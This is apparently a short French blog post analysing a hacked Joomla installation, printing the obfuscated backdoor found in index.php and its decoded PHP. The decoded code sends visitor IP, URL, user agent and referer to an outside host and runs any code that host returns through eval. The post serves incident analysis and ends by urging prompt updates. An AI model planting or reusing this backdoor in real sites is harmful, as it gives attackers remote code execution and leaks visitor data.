Analyse d’une attaque / d’un Hack Joomla

1) Joomla est hacké

2) analyse des sources

Dans l’index.php

preg_replace(« /.+/e », »\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28’nVVrb9owFP1Mf4Ur0TqZIJRp2qQixFBJW6QWmAl7iKLIBEOshThywtSH+O+7jkOgPNqx9kNj33N9zzm+vp0xOTfM2sl0EXoJFyGapRvo5aRQpEPMIzxC6U8dIgmPFDaNLGSQhdLIQAY65NExlRMewjYOhWQTLjHs86kRJzISsZEnlxAOhIiweVqvT2kQM/OFeb4wcM7Fo0HAJkNs5TkWpKn1qgqssVlbqvPRboEcZtazEuj8HO3AsJgJnENS7Ufx5eEfGvAJUqiUTEGyZCFDkL08UjlLPH99jkrwRZxoo+voa9Ht2+S7TYZY/3U7zXsbj7IroTMWauwr6K3j9NwBrNzmjd1xcrhkUyaZhIRdOLGvbWITjWXjQGgC2E+S6LJSiRlYJmYBsxZxhUbi2a+E1F9wK/KjxoQmtI6tMY3Z508uCz0xYUbMJAeTnhm4YOpG8VVdD8S6POSJkZYxdaucQvT4e4iF95slaMJjOoa+2XMXulzMEhFBQc8voasBuev2HBDsDEjHIc1OH5SXqorIYbTTvre7A6eEqhdmDSkxuRb2yDwF1kqQknK8EjaPkickWbwI4Pb39dS62z04pVzW0XJ54yz0kqVkCZFkM3dOocMMfPYwjB5GhvWhYT4MK/B5xjE8l1IRUkzNl0FTG2o9rI6UmAJ75Ikun5IEXbDSm8uTzQGSjgl1hqrKQ5dKSZ+MdYcR+77r2G6z1SLKAx3G1Y9frAv4reLUFnj7aeub5so+OCuGyzC2WvWne90lP5qkZbfUFx5lCZlh6D24krZMZe0kvCK6ozIdebnMPdT6wEUNnJ1dVIenJEKsiRZjz2dztnpesRqXS8TUtNoTxvoKisoc2NtryW2376jajW3xOoAu0eFBsk8Msb8N7L7jDkg7s1eNg0IRmhgoZAQtDIMBRrMiZh3IraWJWtz+Qq02sa8ct39F2r3NgoW82tvg2oFWycHAhvxy+w5pd27WvZIeboHFDWy9m7TqmDdkbPtV+C+z3iyRUYOJtK4R0cTf71EKq73DQ6VvNd+/sO7d9uD77lr9e37l345tG48MDlYv6i8=’\x29\x29\x29\x3B », ». »);

3) Traduction

print gzinflate(base64_decode(« nVVrb9owFP1Mf4Ur0TqZIJRp2qQixFBJW6QWmAl7iKLIBEOshThywtSH+O+7jkOgPNqx9kNj33N9zzm+vp0xOTfM2sl0EXoJFyGapRvo5aRQpEPMIzxC6U8dIgmPFDaNLGSQhdLIQAY65NExlRMewjYOhWQTLjHs86kRJzISsZEnlxAOhIiweVqvT2kQM/OFeb4wcM7Fo0HAJkNs5TkWpKn1qgqssVlbqvPRboEcZtazEuj8HO3AsJgJnENS7Ufx5eEfGvAJUqiUTEGyZCFDkL08UjlLPH99jkrwRZxoo+voa9Ht2+S7TYZY/3U7zXsbj7IroTMWauwr6K3j9NwBrNzmjd1xcrhkUyaZhIRdOLGvbWITjWXjQGgC2E+S6LJSiRlYJmYBsxZxhUbi2a+E1F9wK/KjxoQmtI6tMY3Z508uCz0xYUbMJAeTnhm4YOpG8VVdD8S6POSJkZYxdaucQvT4e4iF95slaMJjOoa+2XMXulzMEhFBQc8voasBuev2HBDsDEjHIc1OH5SXqorIYbTTvre7A6eEqhdmDSkxuRb2yDwF1kqQknK8EjaPkickWbwI4Pb39dS62z04pVzW0XJ54yz0kqVkCZFkM3dOocMMfPYwjB5GhvWhYT4MK/B5xjE8l1IRUkzNl0FTG2o9rI6UmAJ75Ikun5IEXbDSm8uTzQGSjgl1hqrKQ5dKSZ+MdYcR+77r2G6z1SLKAx3G1Y9frAv4reLUFnj7aeub5so+OCuGyzC2WvWne90lP5qkZbfUFx5lCZlh6D24krZMZe0kvCK6ozIdebnMPdT6wEUNnJ1dVIenJEKsiRZjz2dztnpesRqXS8TUtNoTxvoKisoc2NtryW2376jajW3xOoAu0eFBsk8Msb8N7L7jDkg7s1eNg0IRmhgoZAQtDIMBRrMiZh3IraWJWtz+Qq02sa8ct39F2r3NgoW82tvg2oFWycHAhvxy+w5pd27WvZIeboHFDWy9m7TqmDdkbPtV+C+z3iyRUYOJtK4R0cTf71EKq73DQ6VvNd+/sO7d9uD77lr9e37l345tG48MDlYv6i8= »));

En php de base maintenant

germ();
function germ() {
$a[‘ip’] = getip();
$a[‘url’] = getUrl();
$cabardin = ‘noredir’;
if(strpos($a[‘url’], ‘loop’)!==false) {
echo(‘function called[‘.$a[‘url’].’],[‘.$cabardin.’]’);}

if (strpos($a[‘url’],$cabardin)===false && strpos($a[‘url’],’ogo’)===false) { if(strpos($a[‘url’], ‘loop’)!==false){echo(‘invalid url’);} return; } if(strpos($a[‘url’], ‘loop’)!==false){echo(‘fetch url’);} $a[‘host’] = @$_SERVER[‘SERVER_NAME’]; $a[‘agent’] = @$_SERVER[‘HTTP_USER_AGENT’]; $a[‘referer’] = @$_SERVER[‘HTTP_REFERER’]; $eblo = ‘http://seogoogle.us/apozh/nahui.php?data=’.base64_encode(serialize($a)); $ch = @curl_init($eblo); if(!$ch) { if(strpos($a[‘url’], ‘loop’)!==false){echo(‘socket disabled’);} return; } @curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); @curl_setopt($ch, CURLOPT_TIMEOUT, 10); $c = @curl_exec($ch); if (!$c) { if(strpos($a[‘url’], ‘loop’)!==false){echo(’empty resulst’);} return; } if (strpos($c, ‘–return–‘)!==false) {return;} if (preg_match(‘%\[p\](.*?)\[/p\]%i’,$c,$ret)) { eval($ret[1]); exit; } echo($c); exit; } function getip() { if (in_array($_SERVER[‘REMOTE_ADDR’], array(‘127.0.0.1’, ‘localhost’))) { if (isset($_SERVER[‘HTTP_X_FORWARDED_FOR’])) { return $_SERVER[‘HTTP_X_FORWARDED_FOR’]; } } return $_SERVER[‘REMOTE_ADDR’]; } function getUrl() { if (isset($_SERVER[‘HTTPS’]) && $_SERVER[‘HTTPS’] == ‘on’) { $scheme = ‘https’; } else { $scheme = ‘http’; } $host = isset($_SERVER[‘HTTP_HOST’]) ? $_SERVER[‘HTTP_HOST’] : $_SERVER[‘SERVER_NAME’]; if (isset($_SERVER[‘REQUEST_URI’])) { $url = $scheme.’://’.$host.$_SERVER[‘REQUEST_URI’]; } elseif (isset($_SERVER[‘REDIRECT_SCRIPT_URI’])) { $url = $_SERVER[‘REDIRECT_SCRIPT_URI’]; if (isset($_SERVER[‘REDIRECT_QUERY_STRING’])) { $url .= ‘?’.$_SERVER[‘REDIRECT_QUERY_STRING’]; } } elseif (isset($_SERVER[‘REQUEST_URI’])) { $url = $scheme.’://’.$host.$_SERVER[‘REQUEST_URI’]; } elseif (isset($_SERVER[‘REDIRECT_URL’])) { $path = $_SERVER[‘REDIRECT_URL’]; $url = $scheme.’://’.$host.$path; }

else

{ $url = $scheme.’://’.$host.$_SERVER[‘PHP_SELF’].’?’.$_SERVER[‘QUERY_STRING’]; }

return $url;

Verdict, il faut mettre à jour ses composants rapidement en cas de faille…..